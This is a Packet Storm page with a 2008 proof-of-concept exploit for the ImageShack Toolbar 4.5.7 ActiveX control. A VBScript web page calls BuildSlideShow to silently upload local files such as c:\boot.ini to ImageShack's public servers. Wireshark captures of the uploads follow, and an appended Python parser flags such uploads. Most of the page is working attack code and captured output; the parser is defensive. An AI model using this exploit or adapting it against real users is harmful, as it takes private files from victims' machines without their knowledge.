imageshack-poc.txt

25 Jan 2008 | Reported by rgod | Type: packetstorm | Source: packetstormsecurity.com

ImageShack Toolbar 4.5.7 FileUploader Class security poc for arbitrary file uploa

Code
`<!--  
ImageShack Toolbar 4.5.7 FileUploader Class (ImageShackToolbar.dll) insecure  
method poc  
  
This tool may allow a malicious web page to post arbitrary images on the web  
from a user hard drive. Images will be visible on ImageShack site, a way for an  
attacker to retrieve them maybe tag search or by understanding the renaming  
operation, ex. "_" chars are removed and the "tq2" string is appended.  
My test image is still visible here:  
http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg  
Note that a file with a non-image extension can cross the network, Imageshack  
server replies with an error message, however this needs further investigation  
that I let you to do, ex. with custom packet fields injection.  
  
I suggest users to uninstall it temporarily and just use the site functionalities  
  
Object safety report:  
  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: True  
IDisp Safe: Safe for untrusted: caller  
  
rgod-tsid-pa-he-ru-ka  
-  
stay tuned with us ...  
http://retrogod.altervista.org/join.html  
security feeds, radio streams, techno/drum & bass stations to come  
-->  
  
<html>  
<body>  
<object classid='clsid:BDF9442E-9B03-42C2-87BA-2A459B0A5317' id='suntzu' /></object>  
<script language='vbscript'>  
suntzu.BuildSlideShow "file:///c:\\xp_wallpaper_glass.jpg","Big",1,"uhuhinterestingprivatethings","Fade","White"  
suntzu.BuildSlideShow "file:///c:\\boot.ini", "Big",1,"uhuhinterestingprivatethings","Fade","White"  
</script>  
</body>  
</html>  
  
----  
  
some wireshark's dump samples:  
  
POST /upload_api.php HTTP/1.1  
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141  
Content-Length: 21755  
User-Agent: ImageShack Toolbar 4.5.7 ([..])  
Host: load9.imageshack.us  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1  
  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="toolbar"  
  
IEImageShackToolbar-4.5.7.69  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="public"  
  
yes  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="xml"  
  
newformat  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="tags"  
  
uhuhinterestingprivatethings  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="rembar"  
  
1  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="fileupload"; filename="xp_wallpaper_glass.jpg"  
Content-Type: image/jpeg  
Content-Transfer-Encoding: binary  
  
[file content]  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="thumbupload"; filename="xp_wallpaper_glass6fa1f1.jpg"  
Content-Type: image/jpeg  
Content-Transfer-Encoding: binary  
  
[file content]  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="class"  
  
s  
--B-O-U-N-D-A-R-Y731553141--  
  
  
reply:  
  
HTTP/1.1 200 OK  
Connection: close  
Transfer-Encoding: chunked  
X-Powered-By: PHP/5.1.2  
Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us  
Set-Cookie: PHPSESSID=[..]; path=/  
Set-Cookie: always_opt=-1; path=/; domain=.imageshack.us  
Set-Cookie: rem_bar=1; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Content-type: text/xml  
Pragma: public  
Cache-Control: must-revalidate, post-check=0, pre-check=0  
Date: Thu, 24 Jan 2008 07:56:25 GMT  
Server: lighttpd/1.4.8  
  
<?xml version="1.0" encoding="iso-8859-1"?><imginfo xmlns="http//ns.imageshack.us/imginfo/6/" version="6" timestamp="1201161385">  
<rating>  
<ratings>0</ratings>  
<avg>0.0</avg>  
</rating>  
<files server="262" bucket="7959">  
<image size="16646" content-type="image/jpeg">xpwallpaperglasstq2.jpg</image>  
<thumb size="3155" content-type="image/jpeg">xpwallpaperglasstq2.th.jpg</thumb>  
</files>  
<resolution>  
<width>426</width>  
<height>320</height>  
</resolution>  
<class>s</class>  
<uploader>  
<ip>87.11.97.155</ip>  
</uploader>  
<links>  
<image_link>http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg</image_link>  
<image_html><a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a></image_html>  
<image_bb>[URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg[/IMG][/URL]</image_bb>  
<image_bb2>[url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg][/url]</image_bb2>  
<thumb_link>http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg</thumb_link>  
<thumb_html><a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a></thumb_html>  
<thumb_bb>[URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg[/IMG][/URL]</thumb_bb>  
<thumb_bb2>[url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg][/url]</thumb_bb2>  
<ad_link>http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg</ad_link>  
<done_page>http://img262.imageshack.us/content.php?page=done&l=img262/7959/xpwallpaperglasstq2.jpg</done_page>  
</links>  
</imginfo>  
  
with the boot.ini file:  
  
POST /upload_api.php HTTP/1.1  
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y732118720442  
Content-Length: 1077  
User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2)  
Host: load10.imageshack.us  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: imgshck=[..]; un_cookie=1; latest=img214; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1; always_opt=-1  
  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="toolbar"  
  
IEImageShackToolbar-4.5.7.69  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="public"  
  
yes  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="xml"  
  
newformat  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="tags"  
  
uhuhinterestingprivatethings  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="rembar"  
  
1  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="fileupload"; filename="boot.ini"  
Content-Type: application/octet-stream  
Content-Transfer-Encoding: binary  
  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" / fastdetect /NoExecute=OptIn  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="class"  
  
s  
--B-O-U-N-D-A-R-Y732118720442--  
  
reply:  
  
HTTP/1.1 200 OK  
Transfer-Encoding: chunked  
X-Powered-By: PHP/5.1.2  
Content-Type: text/xml  
Set-Cookie: latest=img89; expires=Sun, 18-Jan-2009 07:56:28 GMT; path=/; domain=.imageshack.us  
Date: Thu, 24 Jan 2008 07:56:28 GMT  
Server: lighttpd/1.4.18  
  
<links>  
<error id="wrong_file_type">Wrong file type detected for file boot.ini:application/octet-stream</error>  
</links>  
  
  
`
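
A detection-side reading of the two captures above, as an added example that is not part of the original PoC or of any ImageShack code: a Python parser for captured upload requests that flags toolbar-originated uploads whose file parts are not declared as images. The function names and the sample bytes are constructed here, abridged from the page's boot.ini capture.

```python
import re

# Constructed sample, abridged from the boot.ini capture shown on this page.
B = "B-O-U-N-D-A-R-Y732118720442"
SAMPLE = "\r\n".join([
    "POST /upload_api.php HTTP/1.1",
    f"Content-Type: multipart/form-data, boundary={B}",
    "User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2)",
    "Host: load10.imageshack.us", "",
    f"--{B}", 'Content-Disposition: form-data; name="public"', "", "yes",
    f"--{B}", 'Content-Disposition: form-data; name="tags"', "",
    "uhuhinterestingprivatethings",
    f"--{B}", 'Content-Disposition: form-data; name="fileupload"; filename="boot.ini"',
    "Content-Type: application/octet-stream", "", "[boot loader]", "timeout=30",
    f"--{B}--", "",
]).encode("latin-1")

def _headers(block: bytes) -> dict:
    """Parse 'Name: value' lines into a dict keyed by lower-cased name."""
    out = {}
    for line in block.decode("latin-1").split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            out[name.strip().lower()] = value.strip()
    return out

def inspect_toolbar_upload(raw: bytes):
    """Return a finding for an ImageShack Toolbar upload request, else None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    hdrs = _headers(head)
    # The toolbar sends "multipart/form-data, boundary=..." (comma, not ';'),
    # so match the boundary directly instead of trusting a strict MIME parser.
    m = re.search(r"boundary=([^\s;,]+)", hdrs.get("content-type", ""))
    if not m or not hdrs.get("user-agent", "").startswith("ImageShack Toolbar"):
        return None
    fields, files = {}, []
    for part in body.split(b"--" + m.group(1).encode("latin-1"))[1:]:
        if part.startswith(b"--"):  # closing delimiter reached
            break
        phead, _, pbody = part.strip(b"\r\n").partition(b"\r\n\r\n")
        ph = _headers(phead)
        disp = dict(re.findall(r'(\w+)="([^"]*)"', ph.get("content-disposition", "")))
        if "filename" in disp:  # file part: record name and declared type only
            files.append((disp.get("name"), disp["filename"], ph.get("content-type", "")))
        else:
            fields[disp.get("name")] = pbody.decode("latin-1")
    return {"host": hdrs.get("host"), "public": fields.get("public") == "yes",
            "tags": fields.get("tags"), "files": files,
            "non_image": [f[1] for f in files if not f[2].startswith("image/")]}
```

A finding with a non-empty `non_image` list and `public` set means a local non-image file left the host in a toolbar upload, even though the server answered with `wrong_file_type`.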
